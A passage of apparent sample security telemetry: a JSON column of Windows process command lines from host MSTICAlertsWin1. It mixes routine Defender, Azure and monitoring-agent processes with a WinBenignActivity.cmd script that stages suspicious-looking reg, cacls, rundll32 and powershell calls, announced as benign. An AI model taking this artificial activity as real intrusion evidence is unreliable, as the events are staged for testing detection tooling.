scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 21 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -5279 /30391\",\"ping 127.0.0.1 -n 21 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -17541\",\"ping 127.0.0.1 -n 25 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -10858 \",\"ping 127.0.0.1 -n 26 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 5 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\3567\\\\28584.exe\",\"ping 127.0.0.1 -n 15 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -30051 c:\\\\temp\\\\10517\\\\32030.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -30051 c:\\\\temp\\\\10517\\\\32030.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 15 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25563 /10689\",\"ping 127.0.0.1 -n 15 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4674\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -12105 \",\"ping 127.0.0.1 -n 15 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"rundll32 \\\\17279\\\\3548.exe\",\"ping 127.0.0.1 -n 15 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22572 c:\\\\temp\\\\10720\\\\13334.ps1\",\"ping 127.0.0.1 -n 15 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 2 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 2 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 9 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"NaN\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"NaN\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"NaN\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"NaN\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -787 c:\\\\temp\\\\15711\\\\13331.ps1\",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"NaN\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"NaN\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke\",\"\\\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe\\\" /q WD\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\90875AAA-9256-468E-A6B3-041D325C6594\\\\MpSigStub.exe /stub 1.1.15500.2 /payload 1.285.1240.0 /program C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe /q WD\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignaturesUpdateService -ScheduleJob -UnmanagedUpdate\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" GetDeviceTicket -AccessKey 71EBA1DC-4B6E-DCAE-B047-570DC49235AF \",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SpyNetService -RestrictPrivileges -AccessKey AB4A7F64-6DA7-5DB5-6481-327860FAE09C\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SpyNetService -RestrictPrivileges -AccessKey AB4A7F64-6DA7-5DB5-6481-327860FAE09C -Reinvoke\",\"NaN\",\"wmiadap.exe /D /T\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2796\\\" \\\"6368\\\" \\\"6636\\\" \\\"6380\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\wuauclt.exe\\\" /RunHandlerComServer\",\"\\\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe\\\" WD /q\",\"C:\\\\Windows\\\\system32\\\\MpSigStub.exe /stub 1.1.15500.2 /payload 1.285.1230.0 /MpWUStub /program C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe WD /q\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2796\\\" \\\"3216\\\" \\\"6432\\\" \\\"6404\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsW